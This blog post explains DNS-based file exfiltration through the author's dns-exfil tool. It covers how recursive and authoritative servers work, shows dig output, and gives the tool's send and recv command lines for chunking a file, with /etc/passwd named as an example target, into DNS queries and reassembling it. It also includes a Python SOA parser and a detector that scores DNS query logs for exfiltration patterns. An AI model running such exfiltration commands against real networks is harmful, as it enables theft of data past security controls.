Once upon a time, a government auditor insisted to me that keystroke loggers had to run as root, otherwise they would not function properly. So, I wrote a keystroke logger that ran as a normal user and showed it to him.
He wasn’t amused. He said that I was violating government IT policy by demonstrating the program to him.
Some time later, another auditor was adamant that I would not be able to copy files from his secure enclave computers onto the Internet. He said that he had strong network security measures in place. So, I wrote another small program to copy files from his enclave computers onto the Internet.
He wasn’t amused either, but was far more appreciative when I showed him how it worked.
While I no longer publish the keystroke logger source code, I do publish the dns-exfil source code.
Why use the DNS to exfiltrate files
Because many security professionals do not understand how the DNS works and fail to consider the DNS as a mechanism to exfiltrate data.
The DNS is also mature, very reliable and relatively fast.
How the DNS works
There are basically two types of DNS servers.
- Recursive - 188.8.131.52, 184.108.40.206
- Authoritative - ns1.google.com, a.ns.facebook.com
Recursive DNS servers sit close to end-users. They are typically controlled by the local network administrators, ISPs or by large, distributed providers such as Google or Cloudflare. They answer DNS queries from client computers, phones and tablets in a timely fashion. That is their sole purpose in this world. This allows users to get to websites quickly.
Recursive DNS servers normally cache answers, so when a client asks for a common website the answer is fast because it is served from the cache (as long as the record’s TTL has not expired).
What happens when the recursive resolver doesn’t have the answer cached? Then it does a lookup to find the authoritative DNS server(s) for the zone and asks one of them: “Hey, where is xyz.example.com?”
Authoritative DNS servers are controlled by people/orgs on the Internet and, as the name implies, they are authoritative for the domain/zone in question. When a recursive resolver does not have the answer, it gets it from an authoritative DNS server. Anyone who has a domain name has authoritative DNS servers.
How to find authoritative DNS servers
The first field of the SOA record is the primary authoritative DNS server for the domain.
$ dig +short SOA facebook.com
a.ns.facebook.com. dns.facebook.com. 1617231193 14400 1800 604800 300
$ dig +short SOA google.com
ns1.google.com. dns-admin.google.com. 365995851 900 900 1800 60
You can replace SOA with NS to see more authoritative servers than what is listed in the SOA record. Organizations typically have two or more.
$ dig NS +short example.com
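The two `dig +short SOA` lines above are whitespace-separated RDATA in a fixed order (MNAME, RNAME, serial, refresh, retry, expire, minimum). When scripting over dig output it helps to name those fields rather than count columns. The following parser is an added example for this post, not part of dns-exfil; it is fed the exact lines shown above and turns the RNAME mailbox into an ordinary e-mail address (the first dot stands for `@`; RNAMEs with escaped dots are not handled).

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class SOARecord:
    """The seven SOA RDATA fields, in the order `dig +short SOA` prints them."""

    mname: str      # primary authoritative server for the zone
    rname: str      # responsible mailbox, first '.' stands for '@'
    serial: int     # zone version; secondaries transfer when it grows
    refresh: int    # seconds between secondary refresh checks
    retry: int      # seconds before retrying a failed refresh
    expire: int     # seconds after which a stale secondary stops answering
    minimum: int    # negative-caching TTL (RFC 2308)

    @property
    def contact_email(self) -> str:
        """dns-admin.google.com. -> dns-admin@google.com"""
        local, _, domain = self.rname.rstrip(".").partition(".")
        return f"{local}@{domain}"


def parse_soa_short(line: str) -> SOARecord:
    """Parse one `dig +short SOA <zone>` output line into an SOARecord."""
    fields = line.split()
    if len(fields) != 7:
        raise ValueError(f"expected 7 SOA fields, got {len(fields)}: {line!r}")
    mname, rname, *numbers = fields
    serial, refresh, retry, expire, minimum = (int(n) for n in numbers)
    return SOARecord(mname.rstrip("."), rname, serial, refresh, retry, expire, minimum)


if __name__ == "__main__":
    # The two lines below are the dig output quoted in the post.
    for line in (
        "a.ns.facebook.com. dns.facebook.com. 1617231193 14400 1800 604800 300",
        "ns1.google.com. dns-admin.google.com. 365995851 900 900 1800 60",
    ):
        soa = parse_soa_short(line)
        print(f"primary={soa.mname} contact={soa.contact_email} serial={soa.serial}")
```

Feeding it `dig +short SOA <zone> | python3 soa.py` style input gives you the primary server and the published contact in one step; the `ValueError` path catches the common case where dig printed nothing (NXDOMAIN) or a CNAME chain instead of the SOA.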
How can the DNS be used to exfiltrate data
$ dig A xyz.example.com
; <<>> DiG 9.11.5-P4-5.1+deb10u3-Debian <<>> A xyz.example.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 39455
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;xyz.example.com. IN A
;; AUTHORITY SECTION:
example.com. 3177 IN SOA ns.icann.org. noc.dns.icann.org. 2021022314 7200 3600 1209600 3600
;; Query time: 0 msec
;; SERVER: 220.127.116.11#53(18.104.22.168)
;; WHEN: Wed Mar 31 23:43:27 UTC 2021
;; MSG SIZE rcvd: 100
Using the above dig of xyz.example.com, we can see that the client computer (on some corporate network) just sent the data xyz to a DNS server somewhere on the Internet that is authoritative for the zone example.com.
What if xyz was a small part of some file on the client computer (say /etc/passwd)? What if lots of DNS queries were sent with file markers and indexes? Enough DNS queries to reorder and reassemble the entire file?
That’s how dns-exfil works (in a nutshell).
dns-exfil is actually two programs.
- send - runs on a client computer, breaking up files and sending the pieces to the DNS server as ordinary-looking DNS queries.
- recv - runs on the DNS server, reassembling the files from the DNS query log.
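The same query log that recv reads is what a defender has to work with, and the traffic pattern described above (many distinct, long, high-entropy names under one zone from one client) is what stands out in it. The following detector is an added example for this post, not code from dns-exfil or coredns. The log lines are constructed in the shape of coredns’s `log` plugin output, the zone is taken to be the last two labels, and the thresholds (5 unique names, 20-character average subdomain, 3.0 bits average entropy) are assumptions to be tuned against your own baseline.

```python
import math
import re
from collections import Counter, defaultdict

# Constructed sample in the shape of the coredns "log" plugin (not real traffic):
# two ordinary clients and one client whose names look like chunked payload.
SAMPLE_LOG = """\
[INFO] 10.0.0.5:53424 - 39455 "A IN www.example.com. udp 44 false 4096" NOERROR qr,rd,ra 60 0.000123s
[INFO] 10.0.0.5:53425 - 39456 "A IN mail.example.com. udp 45 false 4096" NOERROR qr,rd,ra 61 0.000098s
[INFO] 10.0.0.5:53426 - 39457 "AAAA IN www.example.org. udp 45 false 4096" NOERROR qr,rd,ra 73 0.000101s
[INFO] 10.0.0.7:40999 - 2001 "A IN example.com. udp 40 false 4096" NOERROR qr,rd,ra 56 0.000090s
[INFO] Reloading
[INFO] 10.0.0.9:40001 - 1001 "A IN howdy-0-3f9a1c7e2b8d4065a9f1.example.com. udp 69 false 4096" NXDOMAIN qr,rd,ra 100 0.000110s
[INFO] 10.0.0.9:40002 - 1002 "A IN howdy-1-a8e2c4b0d6f1937e5c2a.example.com. udp 69 false 4096" NXDOMAIN qr,rd,ra 100 0.000112s
[INFO] 10.0.0.9:40003 - 1003 "A IN howdy-2-7b1e9f3c5a0d8e2f4b6c.example.com. udp 69 false 4096" NXDOMAIN qr,rd,ra 100 0.000109s
[INFO] 10.0.0.9:40004 - 1004 "A IN howdy-3-c5d2a8f0e3b7914d6a2e.example.com. udp 69 false 4096" NXDOMAIN qr,rd,ra 100 0.000115s
[INFO] 10.0.0.9:40005 - 1005 "A IN howdy-4-e9c1a7b3f5d0862e4c9b.example.com. udp 69 false 4096" NXDOMAIN qr,rd,ra 100 0.000108s
[INFO] 10.0.0.9:40006 - 1006 "A IN howdy-5-2f8b6a4d0c7e1395fa3e.example.com. udp 69 false 4096" NXDOMAIN qr,rd,ra 100 0.000111s
"""

# Client address, query type and query name from one coredns log line (IPv4 only).
LINE_RE = re.compile(
    r'^\[INFO\] (?P<client>\d{1,3}(?:\.\d{1,3}){3}):\d+ - \d+ '
    r'"(?P<qtype>[A-Z0-9]+) IN (?P<qname>\S+) '
)


def parse_line(line):
    """Return (client, qtype, qname) or None for lines that are not queries."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return m["client"], m["qtype"], m["qname"].rstrip(".").lower()


def split_zone(qname, depth=2):
    """Split 'xyz.example.com' into ('xyz', 'example.com').

    Assumes the zone is the last `depth` labels; a public-suffix list
    would be more accurate for real deployments.
    """
    labels = qname.split(".")
    if len(labels) <= depth:
        return "", qname
    return ".".join(labels[:-depth]), ".".join(labels[-depth:])


def shannon_entropy(text):
    """Bits of entropy per character of `text`; 0.0 for empty or uniform input."""
    if not text:
        return 0.0
    n = len(text)
    return -sum((c / n) * math.log2(c / n) for c in Counter(text).values())


def score_log(lines, min_unique=5, min_avg_len=20, min_avg_entropy=3.0):
    """Group subdomains by (client, zone) and flag groups that look like chunked data.

    Thresholds are constructed starting points, not measured values.
    """
    seen = defaultdict(set)  # (client, zone) -> distinct subdomain strings
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        client, _qtype, qname = parsed
        sub, zone = split_zone(qname)
        if sub:  # a bare zone apex carries no label data
            seen[(client, zone)].add(sub)

    flagged = {}
    for key, subs in seen.items():
        avg_len = sum(len(s) for s in subs) / len(subs)
        avg_entropy = sum(shannon_entropy(s.replace(".", "")) for s in subs) / len(subs)
        if len(subs) >= min_unique and avg_len >= min_avg_len and avg_entropy >= min_avg_entropy:
            flagged[key] = {
                "unique": len(subs),
                "avg_len": round(avg_len, 1),
                "avg_entropy": round(avg_entropy, 2),
            }
    return flagged


if __name__ == "__main__":
    for (client, zone), stats in score_log(SAMPLE_LOG.splitlines()).items():
        print(f"{client} -> {zone}: {stats}")
```

Run against a real log with `score_log(open("coredns.log"))`; the three signals deliberately compound, because long names alone (CDN hostnames) or many unique names alone (reverse lookups) are normal, while all three together from a single client are the shape of a file being pushed out one label at a time. The NXDOMAIN responses in the sample are a fourth signal worth adding: a zone answering NXDOMAIN for thousands of fresh names is unusual for anything but this.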
Sending a file
When demonstrating dns-exfil, I check the file’s MD5 sum before sending so I can compare to the reassembled file on the DNS server later.
$ md5sum ../test-files/gpl-3.0.txt
$ send -file ../test-files/gpl-3.0.txt -marker howdy &> /dev/null
Receiving a file
The reassembled file has the same MD5 sum as the original file on the client.
$ recv -qlog logs/coredns.log -marker howdy > file.txt
$ md5sum file.txt
- When I initially wrote dns-exfil, I used BIND for the DNS server. However, any authoritative DNS server will do. Today, I use coredns as it’s easier to set up and more secure.
- The picture at the top is a baby lizard from our garden. He’s climbing up a water hose.